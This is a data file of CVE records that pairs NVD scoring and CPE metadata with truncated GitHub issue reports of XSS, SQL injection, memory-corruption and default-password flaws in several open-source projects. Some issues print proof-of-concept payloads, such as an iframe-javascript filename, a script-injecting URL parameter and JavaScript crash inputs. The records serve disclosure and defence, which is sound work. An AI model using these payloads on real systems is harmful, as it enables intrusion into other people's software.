{ "cvssMetricV2": null, "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "NONE", "baseScore": 5.4, "baseSeverity": "MEDIUM", "confidentialityImpact": "LOW", "integ...
[ { "source": "cve@mitre.org", "tags": [ "Exploit", "Issue Tracking" ], "url": "https://github.com/phachon/mm-wiki/issues/68" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Issue Tracking" ], "url": "https://github.com/phachon/m...
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:mm-wiki_project:mm-wiki:0.1.2:*:*:*:*:*:*:*", "matchCriteriaId": "01F2E84A-70AD-4E3C-AC27-73B6DCFED407", "versionEndExcluding": null, "versionEndIncluding": null, "versionSta...
[ "79" ]
79
https://github.com/phachon/mm-wiki/issues/68
[ "Exploit", "Issue Tracking" ]
github.com
[ "phachon", "mm-wiki" ]
Hello, I found two vulnerabilities: a stored XSS and a CSRF. Attacker can exploit the vulnerability to execute malicious javascript on a document page and hijack the identity of other users (normal users or administrators). ### XSS The document editor does not filter or block the execution of Javascript, result...
Vulnerability: Stored XSS and CSRF
https://api.github.com/repos/phachon/mm-wiki/issues/68/comments
2
2019-05-14T06:51:22Z
2019-06-01T01:29:06Z
https://github.com/phachon/mm-wiki/issues/68
443,739,654
68
4,905
CVE-2020-19692
2023-04-04T15:15:07.653
Buffer Overflow vulnerabilty found in Nginx NJS v.0feca92 allows a remote attacker to execute arbitrary code via the njs_module_read in the njs_module.c file.
{ "cvssMetricV2": null, "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 9.8, "baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "in...
[ { "source": "cve@mitre.org", "tags": [ "Exploit", "Issue Tracking" ], "url": "https://github.com/nginx/njs/issues/187" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Issue Tracking" ], "url": "https://github.com/nginx/njs/issu...
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:nginx:njs:2019-06-27:*:*:*:*:*:*:*", "matchCriteriaId": "76C92D85-F51F-4CD4-8DC4-BD4428A3C0E1", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcludi...
[ "120" ]
120
https://github.com/nginx/njs/issues/187
[ "Exploit", "Issue Tracking" ]
github.com
[ "nginx", "njs" ]
# env ubuntu 18.04 njs 0feca92 gcc version 7.4.0 (Ubuntu 7.4.0-1ubuntu1~18.04.1) # bug So, actually this is a logic bug, happened under an really interesting circumstance. the buggy function is the njs_module_read in the file njs_module.c ```c if (fstat(fd, &sb) == -1) { goto fail; } text...
Heap based buffer overflow in njs_module.c
https://api.github.com/repos/nginx/njs/issues/187/comments
2
2019-06-29T03:51:34Z
2024-05-29T06:53:25Z
https://github.com/nginx/njs/issues/187
462,261,788
187
4,906
CVE-2020-19693
2023-04-04T15:15:07.697
An issue found in Espruino Espruino 6ea4c0a allows an attacker to execute arbitrrary code via oldFunc parameter of the jswrap_object.c:jswrap_function_replacewith endpoint.
{ "cvssMetricV2": null, "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 9.8, "baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "in...
[ { "source": "cve@mitre.org", "tags": [ "Exploit", "Issue Tracking", "Patch" ], "url": "https://github.com/espruino/Espruino/issues/1684" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Issue Tracking", "Patch" ], "u...
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:o:espruino:espruino:2019-06-28:*:*:*:*:*:*:*", "matchCriteriaId": "8E31E291-A821-4359-93C0-C3B4AF8366EE", "versionEndExcluding": null, "versionEndIncluding": null, "versionStar...
[ "787" ]
787
https://github.com/espruino/Espruino/issues/1684
[ "Exploit", "Issue Tracking", "Patch" ]
github.com
[ "espruino", "Espruino" ]
# env Ubuntu 18.04 Espruino 6ea4c0a # bug This is a critical bug which will cause memory corruption at last, thus may cause potential remote code execution threat to the users. It happens at `jswrap_object.c:jswrap_function_replacewith:`, so if we pass the parameter oldFunc with a null pointer, it may crash. I...
A memory corruption bug in the jswrap_object.c
https://api.github.com/repos/espruino/Espruino/issues/1684/comments
1
2019-07-02T01:41:13Z
2019-07-02T09:29:03Z
https://github.com/espruino/Espruino/issues/1684
462,979,800
1,684
4,907
CVE-2020-19695
2023-04-04T15:15:07.747
Buffer Overflow found in Nginx NJS allows a remote attacker to execute arbitrary code via the njs_object_property parameter of the njs/njs_vm.c function.
{ "cvssMetricV2": null, "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 9.8, "baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "in...
[ { "source": "cve@mitre.org", "tags": [ "Exploit", "Issue Tracking", "Patch" ], "url": "https://github.com/nginx/njs/issues/188" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Issue Tracking", "Patch" ], "url": "htt...
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:nginx:njs:*:*:*:*:*:*:*:*", "matchCriteriaId": "19A4B578-8508-4F14-AF9A-8C6AF2CB12C6", "versionEndExcluding": "0.3.4", "versionEndIncluding": null, "versionStartExcluding": n...
[ "120" ]
120
https://github.com/nginx/njs/issues/188
[ "Exploit", "Issue Tracking", "Patch" ]
github.com
[ "nginx", "njs" ]
# env ubuntu 18.04 njs 0feca92 gcc version 7.4.0 (Ubuntu 7.4.0-1ubuntu1~18.04.1) built with ASAN on # bug ```javascript > (1..__proto__.length = '1', Array.prototype.slice.call(1, 0, 2)).toString() ASAN:SIGSEGV ================================================================= ==13918==ERROR: AddressSanitize...
Array elements left uninitialized in Array.prototype.slice() for primitive this values.
https://api.github.com/repos/nginx/njs/issues/188/comments
5
2019-07-03T02:04:01Z
2019-07-03T14:22:16Z
https://github.com/nginx/njs/issues/188
463,508,475
188
4,908
CVE-2020-19697
2023-04-04T15:15:07.787
Cross Site Scripting vulnerability found in Pandao Editor.md v.1.5.0 allows a remote attacker to execute arbitrary code via a crafted script in the <iframe>src parameter.
{ "cvssMetricV2": null, "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "NONE", "baseScore": 6.1, "baseSeverity": "MEDIUM", "confidentialityImpact": "LOW", "integ...
[ { "source": "cve@mitre.org", "tags": [ "Exploit", "Third Party Advisory" ], "url": "https://github.com/pandao/editor.md/issues/701" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Third Party Advisory" ], "url": "https://github...
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:ipandao:editor.md:1.5.0:*:*:*:*:*:*:*", "matchCriteriaId": "BE347363-151B-40A1-B1CB-17D7E5FC45AA", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcl...
[ "79" ]
79
https://github.com/pandao/editor.md/issues/701
[ "Exploit", "Third Party Advisory" ]
github.com
[ "pandao", "editor.md" ]
Test Environment: Firefox Quantum 67.0.3/Chrome 75.0.3770.100/Safari 12.1.1 Description: User can use <iframe> src attribute to insert malicious javascript codes, and then execute it. Reproduce steps 1. go to https://pandao.github.io/editor.md/en.html or any open editor.md apps 2. in the edit mode, ...
XSS vulnerability found via <iframe> src attribute
https://api.github.com/repos/pandao/editor.md/issues/701/comments
1
2019-07-02T07:42:47Z
2020-09-09T22:13:51Z
https://github.com/pandao/editor.md/issues/701
463,072,353
701
4,909
CVE-2020-19698
2023-04-04T15:15:07.823
Cross Site Scripting vulnerability found in Pandao Editor.md v.1.5.0 allows a remote attacker to execute arbitrary code via a crafted script to the editor parameter.
{ "cvssMetricV2": null, "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "NONE", "baseScore": 6.1, "baseSeverity": "MEDIUM", "confidentialityImpact": "LOW", "integ...
[ { "source": "cve@mitre.org", "tags": [ "Exploit", "Third Party Advisory" ], "url": "https://github.com/pandao/editor.md/issues/700" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Third Party Advisory" ], "url": "https://github...
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:ipandao:editor.md:1.5.0:*:*:*:*:*:*:*", "matchCriteriaId": "BE347363-151B-40A1-B1CB-17D7E5FC45AA", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcl...
[ "79" ]
79
https://github.com/pandao/editor.md/issues/700
[ "Exploit", "Third Party Advisory" ]
github.com
[ "pandao", "editor.md" ]
**Test Environment:** Firefox Quantum 67.0.3/Chrome 75.0.3770.100/Safari 12.1.1 **Description:** User can use <script> src attribute to include external library(ex: angularjs), and then, execute malicious javascript codes. **Reproduce steps** 1. go to https://pandao.github.io/editor.md/en.html or any open edi...
XSS vulnerability found via <script> src attribute
https://api.github.com/repos/pandao/editor.md/issues/700/comments
1
2019-07-02T07:23:56Z
2020-09-09T22:13:24Z
https://github.com/pandao/editor.md/issues/700
463,064,972
700
4,910
CVE-2020-19699
2023-04-04T15:15:07.863
Cross Site Scripting vulnerability found in KOHGYLW Kiftd v.1.0.18 allows a remote attacker to execute arbitrary code via the <ifram> tag in the upload file page.
{ "cvssMetricV2": null, "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "NONE", "baseScore": 6.1, "baseSeverity": "MEDIUM", "confidentialityImpact": "LOW", "integ...
[ { "source": "cve@mitre.org", "tags": [ "Exploit", "Issue Tracking" ], "url": "https://github.com/KOHGYLW/kiftd/issues/32#issuecomment-509868583" }, { "source": "cve@mitre.org", "tags": [ "Product" ], "url": "https://kohgylw.gitee.io/" }, { "source": "af8...
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:kiftd_project:kiftd:1.0.18:*:*:*:*:*:*:*", "matchCriteriaId": "651947BB-B5F7-41E3-92F7-BB284A105309", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartE...
[ "79" ]
79
https://github.com/KOHGYLW/kiftd/issues/32#issuecomment-509868583
[ "Exploit", "Issue Tracking" ]
github.com
[ "KOHGYLW", "kiftd" ]
create a file named with "<iframe src=javascript:alert(4)>.jpg", and upload this file. After that, every user with read permission will be affected. 上传一个命名为"<iframe src=javascript:alert(4)>.jpg"的文档,所有有read权限的使用者都会受影响 ![image](https://user-images.githubusercontent.com/43372967/60877395-4c33a280-a270-11e9-9e3a-481231...
XSS vulnerability found via <iframe> tag when upload file
https://api.github.com/repos/KOHGYLW/kiftd/issues/32/comments
2
2019-07-09T09:41:20Z
2019-07-20T10:55:24Z
https://github.com/KOHGYLW/kiftd/issues/32
465,678,951
32
4,911
CVE-2020-19850
2023-04-04T15:15:07.897
An issue found in Directus API v.2.2.0 allows a remote attacker to cause a denial of service via a great amount of HTTP requests.
{ "cvssMetricV2": null, "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 6.5, "baseSeverity": "MEDIUM", "confidentialityImpact": "NONE", "inte...
[ { "source": "cve@mitre.org", "tags": [ "Exploit", "Patch" ], "url": "https://github.com/directus/api/issues/982" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Patch" ], "url": "https://github.com/directus/api/issues/982" } ...
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:monospace:directus:2.2.0:*:*:*:*:-:*:*", "matchCriteriaId": "7CA0A8B4-8182-4DE0-BDA1-5ACF259BAF91", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExc...
[ "400" ]
400
https://github.com/directus/api/issues/982
[ "Exploit", "Patch" ]
github.com
[ "directus", "api" ]
# Feature Request About audited Directus version. It has been cloned from suite repo. Latest commit https://github.com/directus/directus/commit/1d151a9034514e3f2ec1c80001e7c5fffdef2d4e ### Description: In a replay attack the attacker issues requests that are identical to the ones the user has sent. The appl...
[SECURITY] Replay Attack
https://api.github.com/repos/directus/v8-archive/issues/982/comments
6
2019-05-28T20:37:02Z
2019-07-10T07:06:36Z
https://github.com/directus/v8-archive/issues/982
449,465,645
982
4,912
CVE-2020-20521
2023-04-04T15:15:07.930
Cross Site Scripting vulnerability found in KiteCMS v.1.1 allows a remote attacker to execute arbitrary code via the comment parameter.
{ "cvssMetricV2": null, "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "NONE", "baseScore": 6.1, "baseSeverity": "MEDIUM", "confidentialityImpact": "LOW", "integ...
[ { "source": "cve@mitre.org", "tags": [ "Exploit", "Issue Tracking" ], "url": "https://github.com/Kitesky/KiteCMS/issues/1" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Issue Tracking" ], "url": "https://github.com/Kitesky/Ki...
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:kitesky:kitecms:1.1.1:*:*:*:*:*:*:*", "matchCriteriaId": "9724ED81-2F10-41CD-9E11-B934B3D48457", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExclud...
[ "79" ]
79
https://github.com/Kitesky/KiteCMS/issues/1
[ "Exploit", "Issue Tracking" ]
github.com
[ "Kitesky", "KiteCMS" ]
Hello author, I am honored to be able to use your cms, but when I use it, I found that there are more loopholes after testing, I hope to draw your attention, thank you. Here are some storage xss vulnerabilities, as follows: A front-end comment can get a storage xss vulnerability to the background administrator to coo...
Xss vulnerability
https://api.github.com/repos/kitesky/KiteCMS/issues/1/comments
0
2019-08-12T08:43:35Z
2019-09-26T10:43:07Z
https://github.com/kitesky/KiteCMS/issues/1
479,529,458
1
4,913
CVE-2020-20913
2023-04-04T15:15:08.003
SQL Injection vulnerability found in Ming-Soft MCMS v.4.7.2 allows a remote attacker to execute arbitrary code via basic_title parameter.
{ "cvssMetricV2": null, "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 9.8, "baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "in...
[ { "source": "cve@mitre.org", "tags": [ "Exploit" ], "url": "https://github.com/ming-soft/MCMS/issues/27" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit" ], "url": "https://github.com/ming-soft/MCMS/issues/27" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:mingsoft:mcms:4.7.2:*:*:*:*:*:*:*", "matchCriteriaId": "6F1F89CB-15C4-45DF-8C40-EFFF1768694A", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcludin...
[ "89" ]
89
https://github.com/ming-soft/MCMS/issues/27
[ "Exploit" ]
github.com
[ "ming-soft", "MCMS" ]
Where SQL injection vulnerability code appears @RequestMapping(value = "/{searchId}/search") @ResponseBody public void search(HttpServletRequest request, @PathVariable int searchId, HttpServletResponse response) { SearchEntity _search = new SearchEntity(); _search.setAppId(BasicUtil.getAppId()); _search...
search has SQL injection vulnerability
https://api.github.com/repos/ming-soft/MCMS/issues/27/comments
1
2019-12-26T16:06:06Z
2022-09-09T01:44:33Z
https://github.com/ming-soft/MCMS/issues/27
542,593,169
27
4,914
CVE-2020-20914
2023-04-04T15:15:08.037
SQL Injection vulnerability found in San Luan PublicCMS v.4.0 allows a remote attacker to execute arbitrary code via the sql parameter.
{ "cvssMetricV2": null, "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 9.8, "baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "in...
[ { "source": "cve@mitre.org", "tags": [ "Exploit", "Issue Tracking" ], "url": "https://github.com/sanluan/PublicCMS/issues/29" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Issue Tracking" ], "url": "https://github.com/sanluan...
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:publiccms:publiccms:4.0:*:*:*:*:*:*:*", "matchCriteriaId": "DA4CCE59-6A71-4BC4-86D4-3110B04C1082", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcl...
[ "89" ]
89
https://github.com/sanluan/PublicCMS/issues/29
[ "Exploit", "Issue Tracking" ]
github.com
[ "sanluan", "PublicCMS" ]
Where SQL injection vulnerability code appears com.publiccms.controller.admin.sys.SysSiteAdminController `@RequestMapping("execSql") @Csrf public String execSql(@RequestAttribute SysSite site, @SessionAttribute SysUser admin, String sql, HttpServletRequest request, ModelMap model) { ...
There is a SQL Injection vulnerability that can dump the database
https://api.github.com/repos/sanluan/PublicCMS/issues/29/comments
3
2020-01-06T15:08:03Z
2020-04-01T10:02:10Z
https://github.com/sanluan/PublicCMS/issues/29
545,774,798
29
4,915
CVE-2020-21060
2023-04-04T15:15:08.113
SQL injection vulnerability found in PHPMyWind v.5.6 allows a remote attacker to gain privileges via the delete function of the administrator management page.
{ "cvssMetricV2": null, "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 8.8, "baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "integr...
[ { "source": "cve@mitre.org", "tags": [ "Exploit", "Issue Tracking" ], "url": "https://github.com/gaozhifeng/PHPMyWind/issues/10" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Issue Tracking" ], "url": "https://github.com/gaoz...
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:phpmywind:phpmywind:5.6:*:*:*:*:*:*:*", "matchCriteriaId": "7B3A030C-77BA-4095-9EFC-7B1109E570CB", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcl...
[ "89" ]
89
https://github.com/gaozhifeng/PHPMyWind/issues/10
[ "Exploit", "Issue Tracking" ]
github.com
[ "gaozhifeng", "PHPMyWind" ]
Product Homepage:http://phpmywind.com/ hello! I found a serious SQL injection vulnerability in the backend management system(`/admin/admin_save.php`) of PHPMyWind v5.6 ![3](https://user-images.githubusercontent.com/44093631/67680464-3fc18a00-f9c6-11e9-9e1a-6ebbbec64e44.jpg) This vulnerability allows low-privi...
sql injection exists many places in PHPMyWind v5.6
https://api.github.com/repos/gaozhifeng/PHPMyWind/issues/10/comments
0
2019-10-28T13:32:39Z
2019-10-28T13:32:39Z
https://github.com/gaozhifeng/PHPMyWind/issues/10
513,305,712
10
4,916
CVE-2020-21514
2023-04-04T15:15:08.187
An issue was discovered in Fluent Fluentd v.1.8.0 and Fluent-ui v.1.2.2 allows attackers to gain escalated privileges and execute arbitrary code due to a default password.
{ "cvssMetricV2": null, "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 8.8, "baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "integr...
[ { "source": "cve@mitre.org", "tags": [ "Exploit", "Issue Tracking" ], "url": "https://github.com/fluent/fluentd/issues/2722" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Issue Tracking" ], "url": "https://github.com/fluent/f...
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:fluentd:fluentd:1.8.0:-:*:*:*:*:*:*", "matchCriteriaId": "A57DB6B3-202A-4B44-A484-D63028657CB0", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExclud...
[ "276" ]
276
https://github.com/fluent/fluentd/issues/2722
[ "Exploit", "Issue Tracking" ]
github.com
[ "fluent", "fluentd" ]
### vulnerability info After the default deployment of Fluentd-ui, it is not mandatory to change the password and there is a default password. ``` $ sudo /usr/sbin/td-agent-ui start Puma 2.9.2 starting... * Min threads: 0, max threads: 16 * Environment: production * Listening on tcp://0.0.0.0:9292 Then, open ...
There is a remote command execution vulnerability on version 0.12-1.0
https://api.github.com/repos/fluent/fluentd-ui/issues/295/comments
6
2019-12-10T06:45:33Z
2025-06-06T02:48:57Z
https://github.com/fluent/fluentd-ui/issues/295
536,727,320
295
4,917
CVE-2020-22533
2023-04-04T15:15:08.227
Cross Site Scripting vulnerability found in Zentao allows a remote attacker to execute arbitrary code via the lang parameter
{ "cvssMetricV2": null, "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "NONE", "baseScore": 6.1, "baseSeverity": "MEDIUM", "confidentialityImpact": "LOW", "integ...
[ { "source": "cve@mitre.org", "tags": [ "Exploit", "Issue Tracking" ], "url": "https://github.com/liuyusjs/zentao/issues/1" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Issue Tracking" ], "url": "https://github.com/liuyusjs/z...
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:easycorp:zentao:*:*:*:*:*:*:*:*", "matchCriteriaId": "704FCC75-7031-4841-B524-D830447B54C1", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding"...
[ "79" ]
79
https://github.com/liuyusjs/zentao/issues/1
[ "Exploit", "Issue Tracking" ]
github.com
[ "liuyusjs", "zentao" ]
Excuse me im not good at english XSS vulnerability in all versions of zentao payload: /index.php?lang=1'><ScRiPt >alert(1)</ScRiPt> http://127.0.0.1/index.php?lang=1'><ScRiPt >alert(1)</ScRiPt> ![微信截图_20200319173903](https://user-images.githubusercontent.com/38901459/77053330-2965aa80-6a09-11ea-8424-fbdd...
XSS vulnerability in all versions of zentao
https://api.github.com/repos/liuyusjs/zentao/issues/1/comments
0
2020-03-19T09:44:20Z
2020-03-19T09:44:20Z
https://github.com/liuyusjs/zentao/issues/1
584,284,775
1
4,918
CVE-2020-23257
2023-04-04T15:15:08.263
Buffer Overflow vulnerability found in Espruino 2v05.41 allows an attacker to cause a denial of service via the function jsvGarbageCollectMarkUsed in file src/jsvar.c.
{ "cvssMetricV2": null, "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 7.5, "baseSeverity": "HIGH", "confidentialityImpact": "NONE", "integr...
[ { "source": "cve@mitre.org", "tags": [ "Vendor Advisory" ], "url": "http://www.espruino.com/" }, { "source": "cve@mitre.org", "tags": [ "Exploit", "Issue Tracking" ], "url": "https://github.com/espruino/Espruino/issues/1820" }, { "source": "af854a3a-2127...
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:o:espruino:espruino:2.05.41:*:*:*:*:*:*:*", "matchCriteriaId": "9F58B33D-D60F-4FA4-9E6F-97FBDBCAE0E7", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartEx...
[ "120" ]
120
https://github.com/espruino/Espruino/issues/1820
[ "Exploit", "Issue Tracking" ]
github.com
[ "espruino", "Espruino" ]
Hello, I found that IIlegal memory access may lead to arbitrary memory write inside jsvGarbageCollectMarkUsed . When Object property name is marked ,it will be regarfed as nativeStr struct. And read content pointed by property name and marked,which will result arbitrary memory write. Please confirm~~ poc is here: [...
IIlegal memory access may lead to arbitrary memory write inside jsvGarbageCollectMarkUsed
https://api.github.com/repos/espruino/Espruino/issues/1820/comments
3
2020-05-09T05:10:52Z
2020-05-27T07:01:23Z
https://github.com/espruino/Espruino/issues/1820
615,094,294
1,820
4,919
CVE-2020-23258
2023-04-04T15:15:08.303
An issue found in Jsish v.3.0.11 allows a remote attacker to cause a denial of service via the Jsi_ValueIsNumber function in ./src/jsiValue.c file.
{ "cvssMetricV2": null, "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 7.5, "baseSeverity": "HIGH", "confidentialityImpact": "NONE", "integr...
[ { "source": "cve@mitre.org", "tags": [ "Exploit", "Issue Tracking", "Patch" ], "url": "https://github.com/pcmacdon/jsish/issues/12" }, { "source": "cve@mitre.org", "tags": [ "Broken Link" ], "url": "https://jsish.org/fossil/jsi2/tktview?name=2ba1d89d32" ...
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:jsish:jsish:3.0.11:*:*:*:*:*:*:*", "matchCriteriaId": "DC1BDF14-06F9-4F4F-86E9-CAC99C31A7BE", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding...
[ "787" ]
787
https://github.com/pcmacdon/jsish/issues/12
[ "Exploit", "Issue Tracking", "Patch" ]
github.com
[ "pcmacdon", "jsish" ]
DongzhuoZhao added on 2020-05-11 03:55:46: git version: 4603977ef0ffdaf3d0f641ff6a361aa26e36974d save follow testcase as .js format : var v1 = new Array((()=>"toString")(), []); v1.find(isFinite); run: ./jsimin poc.js Result: zdz@ubuntu:~/jsish$ ./jsimin /home/zdz/debugBug/jsi/bug/poc.js Segmentation ...
Illegal memory dereference in isFiniteCmd
https://api.github.com/repos/pcmacdon/jsish/issues/12/comments
3
2020-05-11T15:54:15Z
2025-05-12T20:43:04Z
https://github.com/pcmacdon/jsish/issues/12
615,992,898
12
4,920
CVE-2020-23259
2023-04-04T15:15:08.340
An issue found in Jsish v.3.0.11 and before allows an attacker to cause a denial of service via the Jsi_Strlen function in the src/jsiChar.c file.
{ "cvssMetricV2": null, "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 7.5, "baseSeverity": "HIGH", "confidentialityImpact": "NONE", "integr...
[ { "source": "cve@mitre.org", "tags": [ "Exploit", "Issue Tracking", "Patch" ], "url": "https://github.com/pcmacdon/jsish/issues/13" }, { "source": "cve@mitre.org", "tags": [ "Broken Link" ], "url": "https://jsish.org/fossil/jsi2/tktview?name=b6bb078e00" ...
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:jsish:jsish:*:*:*:*:*:*:*:*", "matchCriteriaId": "633EAFF5-6C2C-4EA3-8E68-C899A78ECC1E", "versionEndExcluding": null, "versionEndIncluding": "3.0.11", "versionStartExcluding"...
[ "476" ]
476
https://github.com/pcmacdon/jsish/issues/13
[ "Exploit", "Issue Tracking", "Patch" ]
github.com
[ "pcmacdon", "jsish" ]
DongzhuoZhao added on 2020-05-11 05:31:25: git version: 4603977ef0ffdaf3d0f641ff6a361aa26e36974d save follow testcase as .js format : new Array(- 256, 0, - 2.0).forEach(encodeURI); run: ./jsimin poc.js Result: zdz@ubuntu:~/jsish$ ./jsimin /home/zdz/debugBug/jsi/bug/poc.js Segmentation fault (core dumpe...
Null pointer dereference in url_encode
https://api.github.com/repos/pcmacdon/jsish/issues/13/comments
1
2020-05-11T16:11:11Z
2020-05-11T23:41:23Z
https://github.com/pcmacdon/jsish/issues/13
616,004,519
13
4,921
CVE-2020-23260
2023-04-04T15:15:08.373
An issue found in Jsish v.3.0.11 and before allows an attacker to cause a denial of service via the StringReplaceCmd function in the src/jsiChar.c file.
{ "cvssMetricV2": null, "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 7.5, "baseSeverity": "HIGH", "confidentialityImpact": "NONE", "integr...
[ { "source": "cve@mitre.org", "tags": [ "Exploit", "Issue Tracking", "Patch" ], "url": "https://github.com/pcmacdon/jsish/issues/14" }, { "source": "cve@mitre.org", "tags": [ "Broken Link" ], "url": "https://jsish.org/fossil/jsi2/tktview?name=3e211e44b1" ...
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:jsish:jsish:*:*:*:*:*:*:*:*", "matchCriteriaId": "633EAFF5-6C2C-4EA3-8E68-C899A78ECC1E", "versionEndExcluding": null, "versionEndIncluding": "3.0.11", "versionStartExcluding"...
[ "787" ]
787
https://github.com/pcmacdon/jsish/issues/14
[ "Exploit", "Issue Tracking", "Patch" ]
github.com
[ "pcmacdon", "jsish" ]
DongzhuoZhao added on 2020-05-11 03:19:36: git version: 4603977ef0ffdaf3d0f641ff6a361aa26e36974d save follow testcase as .js format : v0=/a/g; var v1="a"; (v1).replace(v0,isFinite); run: ./jsimin poc.js Result: zdz@ubuntu:~/jsish$ ./jsimin /home/zdz/debugBug/jsi/bug/poc.js Segmentation fault (core du...
Illegal memory dereference
https://api.github.com/repos/pcmacdon/jsish/issues/14/comments
2
2020-05-11T16:20:40Z
2020-05-13T07:03:14Z
https://github.com/pcmacdon/jsish/issues/14
616,010,782
14
4,922
CVE-2020-23327
2023-04-04T15:15:08.413
Cross Site Scripting vulnerability found in ZblogCN ZblogPHP v.1.0 allows a local attacker to execute arbitrary code via a crafted payload in title parameter of the module management model.
{ "cvssMetricV2": null, "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "NONE", "baseScore": 6.1, "baseSeverity": "MEDIUM", "confidentialityImpact": "LOW", "integ...
[ { "source": "cve@mitre.org", "tags": [ "Exploit", "Issue Tracking" ], "url": "https://github.com/zblogcn/zblogphp/issues/262" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Issue Tracking" ], "url": "https://github.com/zblogcn...
